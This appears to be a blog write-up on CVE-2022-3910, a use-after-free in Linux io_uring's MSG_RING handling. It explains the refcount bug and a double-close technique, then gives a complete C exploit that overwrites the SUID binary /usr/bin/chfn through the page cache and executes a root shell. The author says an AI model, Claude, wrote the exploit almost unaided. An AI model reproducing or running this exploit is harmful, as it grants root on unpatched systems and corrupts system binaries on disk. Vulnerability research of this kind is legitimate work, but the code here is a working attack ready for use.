Linux Kernel CVE-2022-3910 (h0mbre kCTF bug) LPE
Looking for some more easy same-type-reuse bugs to see what AI can slop out I came across CVE-2022-3910 which was exploited by @h0mbre here.
This was another straightforward file-based UAF that allows same-type reuse, as detailed by @_minipli.
Claude one-shotted this as we had the previous file based exploits done + documented in the same session. Though again without notes/steering/direction it would have gone a completely different (unreliable) way.
Details
In io_uring/io_uring.c (kernels 5.18-5.19.x, fixed by commit fc7222c3a9f5):
static int io_msg_ring(struct io_kiocb *req, unsigned int issue_flags)
{
// ... MSG_RING logic ...
done:
__io_req_complete(req, issue_flags, ret, 0);
io_put_file(req->file); // BUG: called even for fixed files!
req->file = NULL;
return 0;
}
io_put_file() calls fput() on req->file. For fixed files (registered via IORING_REGISTER_FILES), the reference is managed by the registration — operations should NOT do additional fput/fget. But MSG_RING calls io_put_file() unconditionally.
Each IORING_OP_MSG_RING on a fixed file = 1 extra fput.
Exploitation (iouring_dc.c)
Refcount arithmetic:
open() → f_count = 1
dup() → f_count = 2
IORING_REGISTER_FILES → f_count = 3 (fget in registration)
IORING_OP_MSG_RING → f_count = 2 (extra fput from bug)
close(victim_fd) → f_count = 1
IORING_UNREGISTER → f_count = 0 → __fput → FREED
dangling_fd (from dup) still in fd table → dangling pointer to freed struct file.
Deferred __fput handling: The IORING_UNREGISTER_FILES path calls fput() which schedules __fput via task_work_add(). The __fput runs when the task returns to userspace (at the next syscall return). The fork() syscall return in the parent processes all pending task_work, so by the time the spawner child starts, the struct file IS freed.
Exploitation Technique: SUID Binary Overwrite (Double-Close)
The Technique (from CVE-2022-22942-dc.c / minipli)
This technique achieves root shell without needing to read /etc/shadow. It overwrites a SUID binary on disk by exploiting the page cache.
Phase 1: First UAF — Temp File Reuse
- Trigger the vulnerability → dangling_fd to freed struct file
- Spray 256 temp files opened O_RDWR → one reuses the freed slot
- Identify the match:
`fstat(dangling_fd)` returns the temp file’s inode; compare it against each temp fd’s inode
Phase 2: Writable mmap
- `mmap(MAP_SHARED | PROT_WRITE, match_fd, 0)` on the matched temp file
- Don’t touch the mapping yet — pages are faulted lazily
- Close ALL temp fds — the mmap holds the last `f_count` reference
Phase 3: Double-Free
- `close(dangling_fd)` → `fput()` on the SAME struct file → `f_count` 1→0 → `__fput` → struct file FREED AGAIN
- The mmap’s `vm_file` pointer is now dangling
Phase 4: SUID Reuse
- Open the SUID target (e.g., `/usr/bin/chfn`) O_RDONLY, 256 times
- One of these opens reuses the freed struct file slot
- The mmap’s `vm_file` now points to chfn’s struct file
- `vm_file->f_mapping` → chfn’s `address_space` → chfn’s page cache
Phase 5: Overwrite
- `memcpy(mmap_addr, exploit_binary, size)` → triggers page faults
- Page faults resolved via `vm_file->f_mapping` → chfn’s page cache
- The write permission was checked at `mmap()` time (against the temp file)
- The kernel does NOT re-check permissions after the struct file swap
- Our bytes land in chfn’s page cache → chfn is overwritten on disk
Phase 6: Root Shell
- `execve("/usr/bin/chfn")` → runs our overwritten binary as SUID root
- The binary checks `geteuid() == 0` → calls `setuid(0); execve("/bin/sh")`
- Root shell.
Requirements
- Exploit binary must be dynamically linked (smaller than the SUID target)
- SUID target must be larger than the exploit binary
- The exploit binary must check `geteuid()` at startup and exec `/bin/sh` if root
iouring_dc.c
/*
* iouring_dc.c — io_uring MSG_RING UAF → root via SUID binary overwrite
*
* Bug: commit fc7222c3a9f5 (5.18-5.19.x)
*
* Double-close technique (from CVE-2022-22942-dc.c / minipli):
* 1. MSG_RING extra fput → free struct file (dangling_fd stale)
* 2. Spray temp files O_RDWR → one reuses freed slot
* 3. Match via stale fd (fcntl + fstat inode compare)
* 4. mmap(MAP_SHARED, PROT_WRITE) on match — lazy, no pages faulted yet
* 5. Close ALL temp fds + close(dangling_fd) → extra fput → struct file freed AGAIN
* 6. Open SUID target O_RDONLY → reuses slot → mmap's vm_file now points to SUID
* 7. memcpy through mmap → page faults go to SUID's page cache → overwrites binary
* 8. exec overwritten SUID → root shell
*
* When executed as the overwritten SUID (euid==0), drops to /bin/sh.
*
* Compile: gcc -O2 -o iouring_dc iouring_dc.c (dynamic! must fit in SUID)
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <signal.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/sysmacros.h>
#include <stdint.h>
#include <linux/io_uring.h>
#ifndef SYS_io_uring_setup
#define SYS_io_uring_setup 425
#define SYS_io_uring_enter 426
#define SYS_io_uring_register 427
#endif
#ifndef IORING_OP_MSG_RING
#define IORING_OP_MSG_RING 40
#endif
#define SUID_TARGET "/usr/bin/chfn"
#define NUM_SPRAY 256
#define MAX_RETRIES 20
#define TEMP_PREFIX "/var/tmp/.xtmp"
/* ---- io_uring ---- */
/* Minimal io_uring state: the ring fd plus pointers into the two
 * mmap'd regions (the shared SQ/CQ ring and the SQE array). */
struct ring {
int fd; /* io_uring instance fd from io_uring_setup() */
void *sq_ring; /* base of the shared SQ/CQ ring mapping (IORING_OFF_SQ_RING) */
struct io_uring_sqe *sqes; /* SQE array mapping (IORING_OFF_SQES) */
uint32_t *sq_head, *sq_tail, *sq_mask, *sq_array; /* SQ ring fields (via sq_off) */
uint32_t *cq_head, *cq_tail, *cq_mask; /* CQ ring fields (via cq_off) */
struct io_uring_cqe *cqes; /* CQE array inside the ring mapping */
};
/*
 * Create an io_uring instance and mmap its rings into *r.
 *
 * Maps a single region large enough for both the SQ and CQ rings
 * (one mmap at IORING_OFF_SQ_RING sized to the larger of the two),
 * plus the SQE array, then wires up the head/tail/mask pointers from
 * the offsets the kernel returned in io_uring_params.
 *
 * Returns 0 on success, -1 on any setup failure.
 */
static int ring_setup(struct ring *r, unsigned entries)
{
    struct io_uring_params p = {};

    r->fd = syscall(SYS_io_uring_setup, entries, &p);
    if (r->fd < 0)
        return -1;

    /* One mapping covers both rings: take the larger of the two sizes. */
    size_t sq_bytes = p.sq_off.array + p.sq_entries * sizeof(uint32_t);
    size_t cq_bytes = p.cq_off.cqes + p.cq_entries * sizeof(struct io_uring_cqe);
    size_t map_len  = (cq_bytes > sq_bytes) ? cq_bytes : sq_bytes;

    r->sq_ring = mmap(NULL, map_len, PROT_READ | PROT_WRITE,
                      MAP_SHARED | MAP_POPULATE, r->fd, IORING_OFF_SQ_RING);
    r->sqes = mmap(NULL, p.sq_entries * sizeof(struct io_uring_sqe),
                   PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
                   r->fd, IORING_OFF_SQES);
    if (r->sq_ring == MAP_FAILED || r->sqes == MAP_FAILED)
        return -1;

    r->sq_head  = r->sq_ring + p.sq_off.head;
    r->sq_tail  = r->sq_ring + p.sq_off.tail;
    r->sq_mask  = r->sq_ring + p.sq_off.ring_mask;
    r->sq_array = r->sq_ring + p.sq_off.array;
    r->cq_head  = r->sq_ring + p.cq_off.head;
    r->cq_tail  = r->sq_ring + p.cq_off.tail;
    r->cq_mask  = r->sq_ring + p.cq_off.ring_mask;
    r->cqes     = r->sq_ring + p.cq_off.cqes;
    return 0;
}
/* Copy one SQE into the next free submission slot and publish it.
 * The release store on the tail ensures the kernel observes the SQE
 * and sq_array entry before it sees the new tail value. */
static void ring_push(struct ring *r, struct io_uring_sqe *sqe)
{
    uint32_t tail = *r->sq_tail;
    uint32_t slot = tail & *r->sq_mask;

    r->sqes[slot] = *sqe;
    r->sq_array[slot] = slot;
    __atomic_store_n(r->sq_tail, tail + 1, __ATOMIC_RELEASE);
}
/* io_uring_enter wrapper: submit `s` SQEs, wait for `w` completions. */
static int ring_enter(struct ring *r, int s, int w)
{
    return syscall(SYS_io_uring_enter, r->fd, s, w,
                   IORING_ENTER_GETEVENTS, NULL, 0);
}
/* Retire one CQE by advancing the completion-queue head with a
 * release store, handing the slot back to the kernel. */
static void ring_consume(struct ring *r)
{
    uint32_t head = *r->cq_head;

    __atomic_store_n(r->cq_head, head + 1, __ATOMIC_RELEASE);
}
/* Pin the calling thread to CPU `c` (best effort; errors ignored). */
static void pin_cpu(int c)
{
    cpu_set_t mask;

    CPU_ZERO(&mask);
    CPU_SET(c, &mask);
    sched_setaffinity(0, sizeof(mask), &mask);
}
/* Map `path` read-only and pre-fault all of its pages.
 *
 * On success, stores the file size in *len and returns the mapping
 * address; the fd is closed before returning (the mapping keeps the
 * file referenced). On any failure the process exits via _exit(1)
 * after perror(), matching the caller's "abort on error" policy.
 *
 * Fixes vs. original: the fstat() result is checked (a failed fstat
 * previously left sb uninitialized), and page touching uses char *
 * arithmetic instead of the non-standard void * arithmetic extension. */
static void *map_file(const char *path, size_t *len)
{
    struct stat sb;
    int fd = open(path, O_RDONLY);
    if (fd < 0) { perror(path); _exit(1); }
    if (fstat(fd, &sb) != 0) { perror("fstat"); _exit(1); }
    *len = (size_t)sb.st_size;
    void *addr = mmap(NULL, *len, PROT_READ, MAP_SHARED, fd, 0);
    if (addr == MAP_FAILED) { perror("mmap"); _exit(1); }
    /* Touch one byte per page so later reads through the mapping
     * cannot fault lazily at an inconvenient time. */
    for (size_t i = 0; i < *len; i += 4096)
        (void)*(volatile const char *)((const char *)addr + i);
    close(fd);
    return addr;
}
/*
 * Exploit driver. Overall flow:
 *   Stage 0  : if we are already the overwritten SUID copy (euid==0),
 *              drop straight to a root shell.
 *   Phase 1  : MSG_RING extra fput on a fixed file frees its struct file
 *              while dangling_fd (a dup) still references it.
 *   Phase 2/3: spray O_RDWR temp files to reclaim the freed slot and
 *              identify the reclaiming fd via inode comparison.
 *   Phase 4/5: take a writable MAP_SHARED mapping on the match, drop all
 *              fds, then close(dangling_fd) to free the struct file again.
 *   Phase 6/7: reclaim the slot with the SUID target's struct file and
 *              write our own image into its page cache via the mapping.
 *   Phase 8  : verify and exec the overwritten target.
 */
int main(int argc, char **argv)
{
/* ---- Stage 0: If we ARE the overwritten SUID binary → root shell ---- */
if (!geteuid()) {
setuid(0); setgid(0);
execve("/bin/sh", (char *const []){"/bin/sh", NULL}, NULL);
_exit(1);
}
/* Refuse to run the destructive path as real root — nothing to gain. */
if (!getuid()) {
fprintf(stderr, "[!] Don't run as root\n"); return 1;
}
setbuf(stdout, NULL);
char *suid_path = argc > 1 ? argv[1] : SUID_TARGET;
printf("=== io_uring MSG_RING UAF → root shell (SUID overwrite) ===\n");
printf("[*] Target: %s\n\n", suid_path);
/* Verify SUID target: root-owned, setuid bit plus some execute bit (04111) */
struct stat suid_st;
if (stat(suid_path, &suid_st) != 0 || suid_st.st_uid != 0 ||
!(suid_st.st_mode & 04111)) {
printf("[!] %s not SUID root\n", suid_path); return 1;
}
/* Map exploit binary and SUID target */
size_t prog_size, suid_size;
const void *prog_addr = map_file("/proc/self/exe", &prog_size);
map_file(suid_path, &suid_size);
/* The overwrite is in-place through the page cache, so our image must fit */
if (suid_size < prog_size) {
printf("[!] %s (%zu) too small for exploit (%zu)\n",
suid_path, suid_size, prog_size);
return 1;
}
printf("[+] Exploit: %zu bytes, %s: %zu bytes\n", prog_size, suid_path, suid_size);
pin_cpu(0); /* stay on one CPU so freed/reclaimed objects share per-CPU slabs */
/* ---- Phase 1: Trigger UAF via io_uring MSG_RING ---- */
printf("[*] Phase 1: Triggering UAF\n");
/* Pipes first (SLUB isolation) */
/* NOTE(review): opening pipes first is a heuristic to shape slab
 * neighbours before the target file is allocated — best effort only. */
int pipes[4][2];
for (int i = 0; i < 4; i++) pipe(pipes[i]);
struct ring ring;
ring_setup(&ring, 8);
int target_fd = open("/tmp/.xdc_target", O_RDWR|O_CREAT|O_TRUNC, 0666);
int dangling_fd = dup(target_fd);
/* f_count = 2 */
int fds[1] = { target_fd };
syscall(SYS_io_uring_register, ring.fd, IORING_REGISTER_FILES, fds, 1);
/* f_count = 3 */
/* MSG_RING extra fput: f_count 3→2 */
struct io_uring_sqe sqe = {};
sqe.opcode = IORING_OP_MSG_RING;
/* sqe.fd is the fixed-file INDEX (slot 0), not a raw fd, because of
 * IOSQE_FIXED_FILE — this is what makes the extra fput hit our file. */
sqe.fd = 0; sqe.flags = IOSQE_FIXED_FILE; sqe.user_data = 1;
ring_push(&ring, &sqe);
ring_enter(&ring, 1, 1);
ring_consume(&ring);
/* close + unregister: f_count 2→1→0 (deferred) */
close(target_fd);
syscall(SYS_io_uring_register, ring.fd, IORING_UNREGISTER_FILES, NULL, 0);
close(ring.fd);
/* Fork helper: triggers parent's deferred __fput → FREED synchronously */
{
pid_t p = fork();
if (p == 0) _exit(0);
waitpid(p, NULL, 0);
}
/* Additional flush */
syscall(SYS_getpid);
usleep(100000);
printf("[+] struct file FREED, dangling_fd=%d\n", dangling_fd);
/* ---- Phase 2+3: Spray temp files + find match (with retry) ---- */
int temp_fds[NUM_SPRAY];
int match_fd = -1;
for (int attempt = 0; attempt < MAX_RETRIES; attempt++) {
if (attempt > 0) {
printf("[*] Retry %d/%d\n", attempt, MAX_RETRIES);
usleep(200000);
}
printf("[*] Phase 2: Spraying %d temp files O_RDWR\n", NUM_SPRAY);
for (int i = 0; i < NUM_SPRAY; i++) {
char path[64];
snprintf(path, sizeof(path), TEMP_PREFIX "_%d", i);
temp_fds[i] = open(path, O_RDWR|O_CREAT|O_TRUNC, 0600);
if (temp_fds[i] < 0) { perror("open temp"); return 1; }
unlink(path); /* name gone; fd (and later the mmap) keep the inode alive */
ftruncate(temp_fds[i], prog_size); /* size it so the full payload maps */
}
printf("[*] Phase 3: Probing stale fd %d\n", dangling_fd);
int flags = fcntl(dangling_fd, F_GETFL);
struct stat stale_sb;
fstat(dangling_fd, &stale_sb);
printf("[*] flags=%#x ino=%lu\n", flags, (unsigned long)stale_sb.st_ino);
/* The slot was reclaimed by one of our O_RDWR sprays iff the stale fd
 * now reports O_RDWR access mode. */
if (flags < 0 || (flags & O_ACCMODE) != O_RDWR) {
printf("[-] Not O_RDWR\n");
for (int i = 0; i < NUM_SPRAY; i++) close(temp_fds[i]);
continue;
}
/* Find which temp fd matches the stale fd */
match_fd = -1;
for (int i = 0; i < NUM_SPRAY; i++) {
struct stat sb;
if (fstat(temp_fds[i], &sb) == 0 &&
sb.st_ino == stale_sb.st_ino && sb.st_dev == stale_sb.st_dev) {
match_fd = temp_fds[i];
printf("[+] Match: temp_fds[%d] (fd %d)\n", i, match_fd);
break;
}
}
if (match_fd >= 0) break;
printf("[-] No match (ino=%lu), retrying\n", (unsigned long)stale_sb.st_ino);
for (int i = 0; i < NUM_SPRAY; i++) close(temp_fds[i]);
}
if (match_fd < 0) {
printf("[!] Failed to find match after %d retries\n", MAX_RETRIES);
return 1;
}
/* ---- Phase 4: mmap the matched file (lazy, no faults yet) ---- */
printf("[*] Phase 4: Creating writable mmap (%zu bytes)\n", prog_size);
void *mmap_addr = mmap(NULL, prog_size, PROT_READ|PROT_WRITE,
MAP_SHARED, match_fd, 0);
if (mmap_addr == MAP_FAILED) { perror("mmap"); return 1; }
/* Close ALL temp fds — mmap holds the last f_count reference */
for (int i = 0; i < NUM_SPRAY; i++) close(temp_fds[i]);
/* ---- Phase 5: Double-free ----
* close(dangling_fd) → fput on the SAME struct file again.
* mmap was PROT_WRITE|MAP_SHARED against the temp file.
* After this fput, f_count=0 → __fput → struct file freed AGAIN.
* The mmap's vm_file is now a dangling pointer. */
printf("[*] Phase 5: Double-free via close(dangling_fd)\n");
close(dangling_fd);
usleep(200000); /* RCU grace period */
/* ---- Phase 6: Reallocate with SUID target ---- */
printf("[*] Phase 6: Opening %s O_RDONLY x%d\n", suid_path, NUM_SPRAY);
int suid_fds[NUM_SPRAY];
for (int i = 0; i < NUM_SPRAY; i++) {
suid_fds[i] = open(suid_path, O_RDONLY);
if (suid_fds[i] < 0) { perror("open suid"); return 1; }
}
/* ---- Phase 7: Overwrite SUID via mmap ----
* memcpy triggers page faults → resolved via vm_file->f_mapping
* which now points to the SUID binary's address_space → writes
* land in the SUID's page cache → overwrites the binary on disk. */
printf("[*] Phase 7: Overwriting %s via mmap (%zu bytes)\n", suid_path, prog_size);
memcpy(mmap_addr, prog_addr, prog_size);
for (int i = 0; i < NUM_SPRAY; i++) close(suid_fds[i]);
/* ---- Phase 8: Exec overwritten SUID ---- */
/* Re-map the target and compare against our own image to confirm the write */
size_t verify_size;
const void *verify = map_file(suid_path, &verify_size);
if (memcmp(verify, prog_addr, prog_size) == 0) {
printf("\n[+] *** %s overwritten successfully! ***\n", suid_path);
printf("[*] Spawning root shell...\n\n");
execve(suid_path, (char *const []){suid_path, NULL}, NULL);
perror("execve");
} else {
printf("[-] Overwrite verification failed\n");
}
/* Ghost to avoid exit crash */
/* NOTE(review): presumably parked forever so process exit never walks the
 * corrupted mapping/file state — confirm against the original writeup. */
setsid(); close(0); close(1); close(2);
sigset_t set; sigfillset(&set); sigprocmask(SIG_BLOCK, &set, NULL);
for (;;) pause();
return 1;
}